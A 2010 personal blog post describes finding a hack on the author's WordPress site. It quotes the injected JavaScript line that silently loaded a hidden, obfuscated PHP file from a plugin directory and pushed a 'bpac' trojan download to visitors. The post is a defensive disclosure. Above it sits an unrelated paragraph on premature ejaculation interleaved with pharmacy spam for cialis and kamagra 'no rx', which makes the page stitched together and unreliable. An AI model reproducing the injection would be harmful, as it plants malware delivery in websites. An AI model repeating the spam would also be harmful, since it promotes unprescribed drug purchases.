Most cases of premature ejaculation do not have a clear cause. With sexual experience and age, men often learn to delay orgasm. Premature ejaculation may occur with a new partner, only in certain sexual situations, or if it has been a long time since the last ejaculation. Psychological factors such as anxiety, guilt, or depression can cause premature ejaculation. In some cases, premature ejaculation may be related to a medical cause such as hormonal problems, injury, or a side effect of certain medicines. Quick flash to our customers: order cialis online uk no rx if you need generic cialis and get fast delivery to united kingdom. Worrying that you won't be able to perform in bed can make it harder for you to do just that. Anxiety from other parts of your life can also spill over into the bedroom. Full information about Kamagra product line by Adjanta - buy kamagra online in uk.


November 13th, 2010

So my site was hacked a while ago — it took a while to figure out how, because it was sneaky, and I was busy hunting bears in the outback.

Mildly interesting details follow.

I’m not sure how the code got on my site — suffice it to say, it got write privileges. Somebody probably sneezed on my Facebook page.

Anyway, here is how the thing manifested: the first time on any given day that I would visit any live page on this site, Google Chrome (my browser of choice) would ask me how I wanted to open a file with a name like “bpac.a” — and because Windows decided it was a RealAudio file, and that I should naturally play it with Windows Media Player (which I don’t have installed), the WMP install process would automatically begin.

I don’t know what was in the file; I never saved it or tried to open it, preferring instead to GET IT OFF GET IT OFF GET IT OFF.

I heard later from a visitor that it was a clip of an American football game. Clearly the work of communists.

The source code of the page in question looked completely normal. No weird <script> insertions, no <iframe>s, nothing out of the ordinary.

My reaction. [stolen from]

My reaction.

I finally found it, inserted at the top of one of my own JavaScript includes:

document.write('<script type="text/javascript" src="/wordpress/wp-includes/js/tinymce/plugins/spellchecker/css/jqdialog.min.php"></script>');

The script inserted a call to a php file which was buried in a legitimate plugin’s directory structure in my WordPress installation. The php file was full of the usual 100 solid lines of obfuscated code in the service of sports and other tools of the Devil.

I haven’t seen anything else about this online, so here you go, Internet. You can thank me later.

The “bpac” trojan series is apparently a documented Java exploit.

« previously: Salesman Pete | Home | next: Ramp rig »